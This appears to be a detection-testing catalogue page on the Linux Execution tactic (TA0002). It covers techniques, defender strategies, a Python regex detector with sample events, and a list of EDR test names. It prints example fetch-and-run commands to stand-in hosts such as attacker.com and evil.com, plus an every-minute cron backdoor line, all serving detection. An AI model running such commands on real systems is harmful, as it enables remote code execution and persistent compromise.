Execution - TA0002
Objective:
Run malicious code on the compromised system to achieve operational goals. Execution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery.
ID: TA0002
Linux Context:
Execution on Linux leverages its rich command-line ecosystem. Attackers execute payloads via bash, sh, or alternative shells like zsh, often chaining commands with pipes or redirects (e.g., curl http://evil.com/script.sh | bash). Legitimate utilities—wget, python, or perl—are abused to download and run code, blending into normal admin activity. Scheduled tasks via cron (e.g., crontab -e) or systemd timers ensure repeated execution, while attackers may exploit running services (e.g., injecting into httpd) to launch payloads. In cloud environments, compromised containers might execute malicious images pulled from Docker Hub. Fileless attacks using /dev/shm or /proc/self/exe further complicate detection.
Key Techniques:
Command and Scripting Interpreter (T1059): Executing a malicious .sh file.
Scheduled Task/Job (T1053): Setting a cron job to run a backdoor every minute.
Native API (T1106): Calling execve() in a custom binary.
Flow Example:
An attacker runs
wget -O- http://attacker.com/malware | sh
to fetch and execute a script, or adds the line
* * * * * /bin/bash -c "/tmp/backdoor"
to /etc/crontab.
Defender Strategies:
Monitor process creation and restrict execution permissions. Use EDR engines to detect anomalous command-line patterns.
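As an added example (not part of the EDRmetry catalogue or any of its test definitions), the following Python sketches the command-line pattern detection the Defender Strategies paragraph calls for, applied to the behaviours named in the Linux Context and Flow Example above: download piped to a shell, interpreter-based downloads, execution from /tmp, /dev/shm or a hidden directory, /proc/self/exe, and every-minute cron entries. The regexes, rule names and sample events are assumptions constructed for this example.

```python
import re

# Command-line patterns for the Execution behaviours described on this page.
# The regexes are assumptions written for this example, not EDRmetry rules.
CMDLINE_RULES = {
    "download_piped_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|]*\|\s*(?:/bin/)?(?:ba|z|da)?sh\b"),
    "interpreter_download": re.compile(
        r"\b(?:python3?|perl)\b.*(?:urllib|urlopen|LWP|HTTP::Tiny|socket)"),
    # a tmpfs path (/tmp, /dev/shm) or a path with a hidden directory component
    "exec_from_tmpfs_or_hidden_dir": re.compile(
        r'(?:^|\s|")(?:(?:/tmp|/dev/shm)/|/(?:[^\s/]+/)*\.[^\s/]+/)'),
    "proc_self_exe": re.compile(r"/proc/self/exe"),
}

def classify_cmdline(cmdline: str) -> list:
    """Names of the rules that one process command line matches."""
    return [name for name, rx in CMDLINE_RULES.items() if rx.search(cmdline)]

def check_crontab_line(line: str) -> list:
    """Flag an every-minute schedule and run the command rules on the
    command part of one crontab line (a user field is tolerated)."""
    fields = line.split()
    if not fields or fields[0].startswith("#"):
        return []
    if fields[0].startswith("@"):                 # @reboot, @hourly, ...
        schedule, command = [], " ".join(fields[1:])
    elif len(fields) >= 6:
        schedule, command = fields[:5], " ".join(fields[5:])
    else:
        return []
    every_minute = bool(schedule) and all(f == "*" for f in schedule)
    return (["cron_every_minute"] if every_minute else []) + classify_cmdline(command)

def scan_events(events: list) -> list:
    """(pid, findings) for every process-creation event matching a rule."""
    hits = []
    for ev in events:
        findings = classify_cmdline(ev["cmdline"])
        if findings:
            hits.append((ev["pid"], findings))
    return hits

# Constructed sample telemetry, not captured from a real host.
SAMPLE_EVENTS = [
    {"pid": 4101, "cmdline": "wget -O- http://attacker.com/malware | sh"},
    {"pid": 4102, "cmdline": "/usr/bin/logrotate /etc/logrotate.conf"},
    {"pid": 4103, "cmdline": '/bin/bash -c "/dev/shm/.cache/run"'},
    {"pid": 4104, "cmdline": "perl -MLWP::Simple -e 'getstore(\"http://attacker.com/p\", \"/tmp/p\")'"},
]
```

Running scan_events(SAMPLE_EVENTS) reports pids 4101, 4103 and 4104 while the logrotate event passes clean, and check_crontab_line on the Flow Example crontab line returns both the every-minute and the /tmp findings.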
The current list of corresponding EDRmetry test definitions includes:
EDR-T6138 - Bash HTTP GET data with /dev/tcp
EDR-T6122 - Dump process memory via GDB
EDR-T6009 - eBPF system("whoami") Execution with bpftrace
EDR-T6025 - Encrypted ELF implant
EDR-T6094 - Establish Unix Socket connection
EDR-T6041 - Execute binary listening from a hidden directory as root
EDR-T6085 - Execute Linux Hack Tools
EDR-T6099 - Execute LKM call_usermodehelper() on ICMP
EDR-T6205 - Export proxy_http
EDR-T6039 - File Transfer to a hidden directory
EDR-T0003 - Install suspicious RPM package
EDR-T6086 - LKM Load/unload kernel module
EDR-T6051 - Modify core_pattern file
EDR-T6177 - MySQL UDF Command Execution
EDR-T6173 - OpenSSL - hackshell download without curl
EDR-T6174 - Perl - File download without curl
EDR-T6172 - Python - File download without curl
EDR-T6247 - Python GET File over Network
EDR-T6203 - Renice or Ulimit Execution
EDR-T6123.004 - Revshell mkfifo+nc
EDR-T6171 - Simplest Proc Name Masquerading
EDR-T6278 - Execute mknod/mkfifo
EDR-T6302 - K8S - Sidecar injection
EDR-T6379 - K8S - Exec into pod
EDR-T6340 - Python HTTP POST and Exec